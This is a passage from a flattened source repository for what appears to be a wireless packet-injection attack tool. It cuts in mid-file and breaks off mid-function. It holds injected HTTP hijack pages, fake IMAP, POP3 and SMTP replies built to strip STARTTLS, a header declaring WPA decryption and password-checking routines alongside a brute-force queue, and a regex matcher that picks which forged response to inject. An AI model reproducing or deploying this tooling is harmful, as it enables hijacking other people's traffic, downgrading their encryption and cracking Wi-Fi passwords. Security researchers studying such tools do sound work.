65 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 66 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 67 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 68 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 69 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 70 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 71 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 72 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 73 | 74 | 75 | -------------------------------------------------------------------------------- /content/http_hijack: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | Content-Length: 200 5 | 6 | 7 | 8 | pwned 9 | 10 | 11 | Hello DEFCON people! 12 | 13 | 14 | -------------------------------------------------------------------------------- /content/imap_no_starttls: -------------------------------------------------------------------------------- 1 | * CAPABILITY IMAP4rev1 ID XLIST UIDPLUS UNSELECT LOGINDISABLED 2 | 1 OK CAPABILITY completed 3 | -------------------------------------------------------------------------------- /content/imap_stoptls: -------------------------------------------------------------------------------- 1 | 2 BAD There is no fuckin TLS 2 | -------------------------------------------------------------------------------- /content/no_ssl_please: -------------------------------------------------------------------------------- 1 | fuck_ssl 2 | -------------------------------------------------------------------------------- /content/pop3_stoptls: -------------------------------------------------------------------------------- 1 | -ERR No no, there is no fuckin TLS 2 | -------------------------------------------------------------------------------- /content/site_hijack: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | Content-Length: 2000 5 | 6 | pwned 7 | 8 | 9 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 11 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 22 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 23 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 24 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 25 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 27 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 28 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 29 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 30 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 31 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 32 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 33 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 34 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 35 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 36 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 37 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 38 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 39 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 40 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 41 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 42 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 44 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 45 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 46 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 47 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 48 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 49 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 50 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 51 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 52 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 53 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 54 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 55 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 56 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 57 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 58 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 59 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 60 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 61 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 62 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 63 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 64 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 65 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 66 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 67 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 68 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 69 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 70 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 71 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 72 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 73 | 74 | 75 | -------------------------------------------------------------------------------- /content/smtp_no_starttls: -------------------------------------------------------------------------------- 1 | 250-smtp13.mail.ru 2 | 250-SIZE 73400320 3 | 250-8BITMIME 4 | 250-AUTH PLAIN LOGIN 5 | -------------------------------------------------------------------------------- /content/smtp_stoptls: -------------------------------------------------------------------------------- 1 | 502 There is no TLS here 2 | -------------------------------------------------------------------------------- /crypto.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MD5, SHA-1, RC4 and AES implementations 3 | * 4 | * Copyright (C) 2001-2004 Christophe Devine 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #ifndef _CRYPTO_H 22 | #define _CRYPTO_H 23 | 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | #include "lrc.h" 31 | #include "ap.h" 32 | 33 | #define S_LLC_SNAP "\xAA\xAA\x03\x00\x00\x00" 34 | #define S_LLC_SNAP_ARP (S_LLC_SNAP "\x08\x06") 35 | #define S_LLC_SNAP_IP (S_LLC_SNAP "\x08\x00") 36 | #define S_LLC_SNAP_SPANTREE "\x42\x42\x03\x00\x00\x00\x00\x00" 37 | #define S_LLC_SNAP_CDP "\xAA\xAA\x03\x00\x00\x0C\x20" 38 | #define IEEE80211_FC1_DIR_FROMDS 0x02 39 | 40 | #define TYPE_ARP 0 41 | #define TYPE_IP 1 42 | #define IEEE80211_FC0_SUBTYPE_MASK 0xf0 43 | #define IEEE80211_FC0_SUBTYPE_SHIFT 4 44 | 45 | #define IEEE80211_FC0_SUBTYPE_QOS 0x80 46 | #define IEEE80211_FC0_SUBTYPE_QOS_NULL 0xc0 47 | 48 | #define GET_SUBTYPE(fc) \ 49 | ( ( (fc) & IEEE80211_FC0_SUBTYPE_MASK ) >> IEEE80211_FC0_SUBTYPE_SHIFT ) \ 50 | << IEEE80211_FC0_SUBTYPE_SHIFT 51 | 52 | 53 | #define NULL_MAC (u_char*)"\x00\x00\x00\x00\x00\x00" 54 | #define SPANTREE (u_char*)"\x01\x80\xC2\x00\x00\x00" 55 | #define CDP_VTP (u_char*)"\x01\x00\x0C\xCC\xCC\xCC" 56 | 57 | #define ROL32( A, n ) \ 58 | ( ((A) << (n)) | ( ((A)>>(32-(n))) & ( (1UL << (n)) - 1 ) ) ) 59 | #define ROR32( A, n ) ROL32( (A), 32-(n) ) 60 | 61 | #define EAPOL_PAIRWISE 0x08 62 | #define EAPOL_INSTALL 0x40 63 | #define EAPOL_ACK 0x80 64 | #define EAPOL_MIC 0x01 65 | 66 | #define EAPOL_KEY_VERSION 7 67 | 68 | #define ZERO "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 69 | 70 | struct WPA_ST_info { 71 | struct WPA_ST_info *next; /* next supplicant */ 72 | u_char stmac[6]; /* supplicant MAC */ 73 | u_char bssid[6]; /* authenticator MAC */ 74 | u_char snonce[32]; /* supplicant nonce */ 75 | u_char anonce[32]; /* authenticator nonce */ 76 | u_char keymic[20]; /* eapol frame MIC */ 77 | u_char eapol[256]; /* eapol frame contents */ 78 | u_char ptk[80]; /* pairwise transcient key */ 79 | int eapol_size; /* eapol frame size */ 80 | u_long t_crc; /* last ToDS frame CRC */ 81 | u_long f_crc; /* last FromDS frame CRC */ 82 | int keyver, valid_ptk; 83 | }; 84 | 85 | struct Michael { 86 | u_long key0; 87 | u_long key1; 88 | u_long left; 89 | u_long right; 90 | u_long nBytesInM; 91 | u_long message; 92 | u_char mic[8]; 93 | }; 94 | 95 | struct rc4_state { 96 | int x, y, m[256]; 97 | }; 98 | 99 | void calc_pmk(char *key, char *essid, u_char pmk[40]); 100 | int check_crc_buf(u_char *buf, int len); 101 | int calc_crc_buf(u_char *buf, int len); 102 | u_long calc_crc(u_char *buf, int len); 103 | u_long calc_crc_plain(u_char *buf, int len); 104 | int add_crc32(u_char *data, int length); 105 | int add_crc32_plain(u_char *data, int length); 106 | int calc_tkip_ppk(u_char *h80211, int caplen, u_char TK1[16], 107 | u_char key[16]); 108 | int calc_tkip_mic(u_char * packet, int length, u_char ptk[80], u_char value[8]); 109 | int michael_test(u_char key[8], u_char * message, int length, u_char out[8]); 110 | int calc_tkip_mic_key(u_char * packet, int length, u_char key[8]); 111 | 112 | int decrypt_tkip(u_char *h80211, int caplen, u_char TK1[16]); 113 | int decrypt_ccmp(u_char *h80211, int caplen, u_char TK1[16]); 114 | int encrypt_ccmp(u_char *h80211, int caplen, u_char TK1[16]); 115 | 116 | /* 117 | int decrypt_wep(uint8_t * src_dst, int h80211_len, uint8_t * password); 118 | int encrypt_wep(uint8_t * src_dst, int len, const uint8_t * wepkey); 119 | 120 | int decrypt_wpa(uint8_t * h80211, int h80211_len, struct wpa_info *wp, uint8_t * password, uint8_t * essid, uint8_t * bssid); 121 | int encrypt_wpa(uint8_t * h80211, int h80211_len, struct wpa_info *wp, uint8_t * password, uint8_t * essid, uint8_t * bssid); 122 | */ 123 | int calc_ptk(struct sta_info *, u_char *); 124 | int check_wpa_password(char *, struct sta_info *); 125 | void eapol_wpa_process(u_char *, int, struct sta_info *); 126 | int decrypt_wpa(u_char *, int, struct sta_info *, char *, u_char *, u_char *); 127 | #endif 128 | -------------------------------------------------------------------------------- /logger.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include "logger.h" 13 | 14 | static FILE *logfd; 15 | 16 | extern int debugged; 17 | 18 | int logger_init(const char *filename) 19 | { 20 | FILE *fd; 21 | 22 | if(filename) { 23 | if((fd = fopen(filename, "a"))) { 24 | logfd = fd; 25 | return(1); 26 | } 27 | } else { 28 | logfd = stdout; 29 | return(1); 30 | } 31 | return(0); 32 | } 33 | 34 | void logger(int type, const char *fmt, ...) 35 | { 36 | 37 | va_list ap; 38 | char tfmt[64], tbuf[64]; 39 | 40 | struct tm *tm; 41 | struct timeval tv; 42 | 43 | if(type == DBG && !debugged) { 44 | return; 45 | } 46 | 47 | //tm = malloc(sizeof(struct tm)); 48 | gettimeofday(&tv, NULL); 49 | if((tm = localtime(&tv.tv_sec)) != NULL) { 50 | strftime(tfmt, sizeof(tfmt), "%Y-%m-%d %H:%M:%S.%%06u %z", tm); 51 | snprintf(tbuf, sizeof(tbuf), tfmt, tv.tv_usec); 52 | } 53 | 54 | va_start(ap, fmt); 55 | switch(type) { 56 | case WARN: 57 | (void)fprintf(logfd, "[!] "); 58 | break; 59 | case FATAL: 60 | (void)fprintf(logfd, "[-] "); 61 | break; 62 | } 63 | (void)fprintf(logfd, "[%s] ", tbuf); 64 | if (fmt != NULL) { 65 | (void)vfprintf(logfd, fmt, ap); 66 | } 67 | (void)fprintf(logfd, "\n"); 68 | fflush(logfd); 69 | va_end(ap); 70 | } 71 | -------------------------------------------------------------------------------- /logger.h: -------------------------------------------------------------------------------- 1 | #ifndef _LOGGER_H__ 2 | #define _LOGGER_H__ 3 | 4 | #define DBG 1 5 | #define INFO 2 6 | #define WARN 3 7 | #define FATAL 4 8 | 9 | int logger_init(const char *); 10 | void logger(int type, const char *, ...); 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /lrc.h: -------------------------------------------------------------------------------- 1 | #ifndef __LRC_H__ 2 | #define __LRC_H__ 3 | 4 | #include 5 | #include 6 | 7 | #define PLATFORM_LINUX 1 8 | 9 | #include "osdep/osdep.h" 10 | #include "ieee80211.h" 11 | 12 | #define HOP_DEFAULT_TIMEOUT 5000 13 | #define MTU 1400 14 | 15 | // Can`t be > 4096 16 | #define MAX_PACKET_LENGTH 4096 17 | #define ALRM_TIME 1 18 | 19 | #define LLC_SIZE 8 20 | #define PW_MAX_SIZE 256 21 | #define PW_MAX_COUNT 65535 22 | #define MAX_CHANS_LEN 256 23 | 24 | // context for holding program state 25 | struct ctx { 26 | char *if_inj_name; 27 | char *if_mon_name; 28 | 29 | u_char if_inj_mac[6]; 30 | u_char if_mon_mac[6]; 31 | 32 | u_int channels[MAX_CHANS_LEN]; 33 | u_int channel_fix; 34 | 35 | char *pw_fn; 36 | 37 | libnet_t *lnet; 38 | libnet_ptag_t lnet_p_tcp; 39 | libnet_ptag_t lnet_p_udp; 40 | libnet_ptag_t lnet_p_ip; 41 | 42 | u_int mtu; 43 | 44 | pthread_mutex_t mutex; 45 | 46 | struct matcher_entry *matchers_list; 47 | u_int hop_time; 48 | 49 | // OSDEP structs 50 | struct wif *wi_inj; 51 | struct wif *wi_mon; 52 | 53 | struct ap_info *ap_list; 54 | struct sta_info *sta_list; 55 | 56 | struct threadqueue *brute_queue; 57 | }; 58 | 59 | #define BRUTE_STA 1 60 | #define BRUTE_EXIT 2 61 | 62 | #endif 63 | -------------------------------------------------------------------------------- /matchers.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "lrc.h" 10 | #include "logger.h" 11 | #include "matchers.h" 12 | 13 | struct matcher_entry *matchers_match(const char *data, int datalen, struct ctx *ctx, u_int proto, u_int src_port, u_int dst_port) 14 | { 15 | struct matcher_entry *matcher; 16 | int ovector[30]; 17 | 18 | for(matcher = ctx->matchers_list; matcher != NULL; matcher = matcher->next) { 19 | if(matcher->proto != MATCHER_PROTO_ANY && matcher->proto != proto) { 20 | continue; 21 | } 22 | if((matcher->dst_port > 0 && matcher->dst_port != dst_port) || (matcher->src_port > 0 && matcher->src_port != src_port)) { 23 | continue; 24 | } 25 | if(pcre_exec(matcher->match, NULL, data, datalen, 0, 0, ovector, 30) > 0) { 26 | logger(INFO, "Matched pattern for '%s'", matcher->name); 27 | if(matcher->ignore && pcre_exec(matcher->ignore, NULL, data, datalen, 0, 0, ovector, 30) > 0) { 28 | logger(INFO, "Matched ignore for '%s'", matcher->name); 29 | continue; 30 | } else { 31 | return matcher; 32 | } 33 | } 34 | } 35 | return NULL; 36 | } 37 | 38 | struct matcher_entry *matchers_get_response(u_char *data, u_int datalen, struct ctx *ctx, u_int type, u_int src_port, u_int dst_port) 39 | { 40 | 41 | struct matcher_entry *matcher; 42 | 43 | #ifdef HAVE_PYTHON 44 | PyObject *args; 45 | PyObject *value; 46 | Py_ssize_t rdatalen; 47 | char *rdata; 48 | #endif 49 | 50 | if(!(matcher = matchers_match((const char *)data, datalen, ctx, type, src_port, dst_port))) { 51 | logger(DBG, "No matchers found for data"); 52 | return NULL; 53 | } 54 | 55 | #ifdef HAVE_PYTHON 56 | if(matcher->pyfunc) { 57 | logger(DBG, "We have a Python code to construct response"); 58 | args = PyTuple_New(2); 59 | PyTuple_SetItem(args,0,PyString_FromStringAndSize((const char *)data, datalen)); // here is data 60 | PyTuple_SetItem(args,1,PyInt_FromSsize_t(datalen)); 61 | 62 | value = PyObject_CallObject(matcher->pyfunc, args); 63 | if(value == NULL) { 64 | PyErr_Print(); 65 | logger(WARN, "Python function returns no data!"); 66 | return NULL; 67 | } 68 | 69 | rdata = PyString_AsString(value); 70 | rdatalen = PyString_Size(value); 71 | 72 | if(rdata != NULL && rdatalen > 0) { 73 | matcher->response_len = (u_int) rdatalen; 74 | if(matcher->response) { 75 | // We already have previous response, free it 76 | free(matcher->response); 77 | } 78 | matcher->response = malloc(matcher->response_len); 79 | memcpy(matcher->response, (u_char *) rdata, rdatalen); 80 | } else { 81 | PyErr_Print(); 82 | logger(WARN, "Python cannot convert return string"); 83 | return NULL; 84 | } 85 | return matcher; 86 | } 87 | #endif 88 | 89 | if(matcher->response) { 90 | logger(DBG, "We have a plain text response"); 91 | return matcher; 92 | } 93 | 94 | logger(WARN, "There is no response data!"); 95 | return NULL; 96 | 97 | } 98 | 99 | 100 | struct matcher_entry *check_block_params(struct matcher_entry *head) 101 | { 102 | 103 | if(head->name == NULL) { 104 | printf("You must specify block name\n"); 105 | return NULL; 106 | } 107 | 108 | if(head->match == NULL) { 109 | printf("Error: block \"%s\" missing match!\n", head->name); 110 | return NULL; 111 | } 112 | 113 | #ifdef HAVE_PYTHON 114 | if((head->response == NULL || head->response_len < 1 || head->response_len > MATCHER_MAX_RESPONSE) && head->pyfunc == NULL) { 115 | #else 116 | if((head->response == NULL || head->response_len < 1 || head->response_len > MATCHER_MAX_RESPONSE)) { 117 | #endif 118 | printf("Error: block \"%s\" has missing or malformed response/pymodule!\n", head->name); 119 | return NULL; 120 | } 121 | 122 | if(!head->proto) { 123 | printf("Error: block \"%s\" has missing proto\n", head->name); 124 | return NULL; 125 | } 126 | 127 | if(head->dst_port >= 65535 || head->dst_port < 0) { 128 | printf("Error: block \"%s\" has incorrect dst port\n", head->name); 129 | return NULL; 130 | } 131 | if(head->src_port >= 65535 || head->src_port < 0) { 132 | printf("Error: block \"%s\" has incorrect src port\n", head->name); 133 | return NULL; 134 | } 135 | return head; 136 | } 137 | 138 | struct matcher_entry *parse_matchers_file(char *matcher_file_path) 139 | { 140 | 141 | FILE *matcher_file; 142 | char matcher_line[MATCHER_MAX_LEN]; 143 | struct matcher_entry *head = NULL; 144 | int line_no = 0; 145 | 146 | matcher_file = fopen(matcher_file_path, "r"); 147 | 148 | if(matcher_file == NULL) { 149 | perror("fopen"); 150 | return NULL; 151 | } 152 | 153 | while(fgets(matcher_line, MATCHER_MAX_LEN, matcher_file) != NULL) { 154 | char command[64] = {0}; 155 | char *argument, *ptr; 156 | const char *errptr; 157 | int arglen, lenread=0; 158 | int c, fd; 159 | #ifdef HAVE_PYTHON 160 | int pyinitialized=0; 161 | #endif 162 | struct stat statbuf; 163 | 164 | line_no++; 165 | 166 | matcher_line[MATCHER_MAX_LEN - 1] = 0; 167 | 168 | sscanf(matcher_line, "%64s", command); 169 | 170 | if(command[0] == 0 || command[0] == '#') { 171 | continue; 172 | } 173 | 174 | argument = matcher_line + strlen(command); 175 | // skip over any whitespace 176 | while(*argument == 0x20 || *argument == 0x09) { 177 | argument++; 178 | } 179 | 180 | arglen = strlen(argument); 181 | 182 | // truncate any new-lines etc 183 | for(ptr = argument + arglen -1; ptr > argument ; ptr--) { 184 | if(*ptr == '\n' || *ptr == '\r') { 185 | *ptr = 0; 186 | } 187 | } 188 | 189 | // start parsing commands 190 | if(strcmp(command, "begin") == 0) { 191 | struct matcher_entry *tmp = malloc(sizeof(struct matcher_entry)); 192 | if(tmp == NULL) { 193 | perror("malloc"); 194 | return NULL; 195 | } 196 | 197 | // need to zero this struct 198 | bzero(tmp, sizeof(struct matcher_entry)); 199 | 200 | tmp->next = head; 201 | head = tmp; 202 | 203 | strncpy(head->name, argument, sizeof(head->name)); 204 | 205 | } else { 206 | if(head == NULL) { 207 | printf("Error in matchers file line %u\n", line_no); 208 | return NULL; 209 | } 210 | 211 | if(strcmp(command, "match") == 0) { 212 | // the regex to match 213 | head->match = pcre_compile(argument, PCRE_MULTILINE|PCRE_DOTALL, &errptr, &c, NULL); 214 | if(head->match == NULL) { 215 | printf("Error at character %d in pattern: \"%s\" (%s)\n", c, argument, errptr); 216 | return NULL; 217 | } 218 | } else if(strcmp(command, "ignore") == 0) { 219 | // the regex to ignore 220 | head->ignore = pcre_compile(argument, PCRE_MULTILINE|PCRE_DOTALL, &errptr, &c,NULL); 221 | 222 | if(head->ignore == NULL) { 223 | printf("Error at character %d in pattern: \"%s\" (%s)\n", c, argument, errptr); 224 | return NULL; 225 | } 226 | } else if(strcmp(command, "option") == 0) { 227 | if(strcmp(argument, "reset") == 0) { 228 | head->options |= MATCHER_OPTION_RESET; 229 | } else { 230 | printf("Unknown option: %s\n", argument); 231 | return NULL; 232 | } 233 | } else if(strcmp(command, "proto") == 0) { 234 | if(strcmp(argument, "tcp") == 0) { 235 | head->proto = MATCHER_PROTO_TCP; 236 | } else if(strcmp(argument, "udp") == 0) { 237 | head->proto = MATCHER_PROTO_UDP; 238 | } else if(strcmp(argument, "any") == 0) { 239 | head->proto = MATCHER_PROTO_ANY; 240 | } else { 241 | printf("Unknown proto: %s\n", argument); 242 | return NULL; 243 | } 244 | } else if(strcmp(command, "dst_port") == 0) { 245 | if(strcmp(argument, "any") == 0) { 246 | head->dst_port = 0; 247 | } else { 248 | head->dst_port = atoi(argument); 249 | } 250 | } else if(strcmp(command, "src_port") == 0) { 251 | if(strcmp(argument, "any") == 0) { 252 | head->src_port = 0; 253 | } else { 254 | head->src_port = atoi(argument); 255 | } 256 | } else if(strcmp(command, "response") == 0) { 257 | // path 